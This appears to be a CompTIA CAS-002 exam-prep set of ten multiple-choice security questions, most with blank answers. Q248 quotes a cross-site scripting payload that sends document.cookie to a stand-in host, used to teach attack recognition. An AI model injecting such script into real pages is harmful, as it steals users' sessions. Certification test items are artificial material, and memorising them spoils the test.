2021 Mar CAS-002 exam guide

Q241. - (Topic 4) 

A Linux security administrator is attempting to resolve performance issues with new software installed on several baselined user systems. After investigating, the security administrator determines that the software is not initializing or executing correctly. For security reasons, the company has implemented trusted operating systems with the goal of preventing unauthorized changes to the configuration baseline. The MOST likely cause of this problem is that SELinux is set to:

A. Enforcing mode with an incorrectly configured policy. 

B. Enforcing mode with no policy configured. 

C. Disabled with a correctly configured policy. 

D. Permissive mode with an incorrectly configured policy. 

Answer:


Q242. - (Topic 1) 

A penetration tester is assessing a mobile banking application. Man-in-the-middle attempts via an HTTP intercepting proxy are failing with SSL errors. Which of the following controls has likely been implemented by the developers?

A. SSL certificate revocation 

B. SSL certificate pinning 

C. Mobile device root-kit detection 

D. Extended Validation certificates 

Answer:


Q243. - (Topic 1) 

The Chief Information Security Officer (CISO) at a company knows that many users store business documents on public cloud-based storage, and realizes this is a risk to the company. In response, the CISO implements a mandatory training course in which all employees are instructed on the proper use of cloud-based storage. Which of the following risk strategies did the CISO implement? 

A. Avoid 

B. Accept 

C. Mitigate 

D. Transfer 

Answer:


Q244. - (Topic 2) 

A port in a fibre channel switch failed, causing a costly downtime on the company’s primary website. Which of the following is the MOST likely cause of the downtime? 

A. The web server iSCSI initiator was down. 

B. The web server was not multipathed. 

C. The SAN snapshots were not up-to-date. 

D. The SAN replication to the backup site failed. 

Answer:


Q245. - (Topic 3) 

A company is preparing to upgrade its NIPS at five locations around the world. The three platforms the team plans to test each claim to have the most advanced features and lucrative pricing.

Assuming all platforms meet the functionality requirements, which of the following methods should be used to select the BEST platform? 

A. Establish return on investment as the main criterion for selection.

B. Run a cost/benefit analysis based on the data received from the RFP. 

C. Evaluate each platform based on the total cost of ownership. 

D. Develop a service level agreement to ensure the selected NIPS meets all performance requirements. 

Answer:


Q246. - (Topic 4) 

A systems administrator establishes a CIFS share on a Unix device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the Unix share. Which of the following settings on the Unix server is the cause of this problem?

A. Refuse LM and only accept NTLMv2 

B. Accept only LM 

C. Refuse NTLMv2 and accept LM 

D. Accept only NTLM 

Answer:


Q247. - (Topic 1) 

A large hospital has implemented BYOD to allow doctors and specialists to access patient medical records on their tablets. The doctors and specialists access patient records over the hospital’s guest WiFi network, which is isolated from the internal network with appropriate security controls. The patient records management system can be accessed from the guest network and requires two-factor authentication. Using a remote desktop type interface, the doctors and specialists can interact with the hospital’s system. Cut and paste and printing functions are disabled to prevent the copying of data to BYOD devices. Which of the following are of MOST concern? (Select TWO).

A. Privacy could be compromised as patient records can be viewed in uncontrolled areas. 

B. Device encryption has not been enabled and will result in a greater likelihood of data loss. 

C. The guest WiFi may be exploited allowing non-authorized individuals access to confidential patient data. 

D. Malware may be on BYOD devices which can extract data via key logging and screen scrapes. 

E. Remote wiping of devices should be enabled to ensure any lost device is rendered inoperable. 

Answer: A,D 


Q248. - (Topic 1) 

A security administrator notices the following line in a server's security log: 

<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "'

The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack? 

A. WAF 

B. Input validation 

C. SIEM 

D. Sandboxing 

E. DAM 

Answer:


Q249. - (Topic 4) 

A system administrator has installed a new Internet-facing secure web application that consists of a Linux web server and a Windows SQL server into a new corporate site. The administrator wants to place the servers in the most logical network security zones and implement the appropriate security controls. Which of the following scenarios BEST accomplishes this goal?

A. Create an Internet zone, DMZ, and Internal zone on the firewall. Place the web server in the DMZ. Configure IPtables to allow TCP 80 and 443. Set SELinux to permissive. Place the SQL server in the internal zone. Configure the Windows firewall to allow TCP 80 and 443. Configure the Internet zone with ACLs of allow 80 and 443 destination DMZ.

B. Create an Internet zone, DMZ, and Internal zone on the firewall. Place the web server in the DMZ. Configure IPtables to allow TCP 443. Set enforcement threshold on SELinux to one. Place the SQL server in the internal zone. Configure the Windows firewall to allow TCP 1433 and 1443. Configure the Internet zone with ACLs of allow 443 destination DMZ. 

C. Create an Internet zone and two DMZ zones on the firewall. Place the web server in the DMZ one. Set the enforcement threshold on SELinux to 100, and configure IPtables to allow TCP 80 and 443. Place the SQL server in DMZ two. Configure the Windows firewall to allow TCP 80 and 443. Configure the Internet zone with an ACL of allow 443 destination ANY. 

D. Create an Internet zone and two DMZ zones on the firewall. Place the web server in DMZ one. Set enforcement threshold on SELinux to zero, and configure IPtables to allow TCP 80 and 443. Place the SQL server in DMZ two. Configure the Internet zone ACLs with allow 80, 443, 1433, and 1443 destination ANY. 

Answer:


Q250. - (Topic 1) 

A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share. Which of the following settings on the UNIX server would correct this problem?

A. Refuse LM and only accept NTLMv2 

B. Accept only LM 

C. Refuse NTLMv2 and accept LM 

D. Accept only NTLM 

Answer: